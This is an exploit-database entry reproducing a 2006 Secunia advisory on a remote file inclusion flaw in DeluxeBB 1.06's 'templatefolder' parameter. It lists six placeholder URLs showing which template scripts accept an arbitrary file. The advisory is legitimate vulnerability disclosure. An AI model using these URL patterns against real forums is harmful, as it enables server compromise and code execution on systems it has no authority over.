DeluxeBB 1.06 - 'templatefolder' Remote File Inclusion

Author: Andreas Sandblad
type: webapps
platform: php
port: 
date_added: 2006-06-14  
date_updated: 2016-11-25  
verified: 1  
codes: OSVDB-26463;CVE-2006-2914;OSVDB-26462;OSVDB-26461;OSVDB-26460;OSVDB-26458  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 1916.txt  

Secunia Research has discovered some vulnerabilities in DeluxeBB,
which can be exploited by malicious people to conduct SQL injection
attacks and compromise a vulnerable system.

1) Input passed to the "templatefolder" parameter in various scripts
isn't properly verified, before it is used to include files. This can
be exploited to include arbitrary files from external and local
resources.

Examples:
http://[host]/templates/deluxe/postreply.php?templatefolder=[file]
http://[host]/templates/deluxe/posting.php?templatefolder=[file]
http://[host]/templates/deluxe/pm/newpm.php?templatefolder=[file]
http://[host]/templates/default/postreply.php?templatefolder=[file]
http://[host]/templates/default/posting.php?templatefolder=[file]
http://[host]/templates/default/pm/newpm.php?templatefolder=[file]

# milw0rm.com [2006-06-15]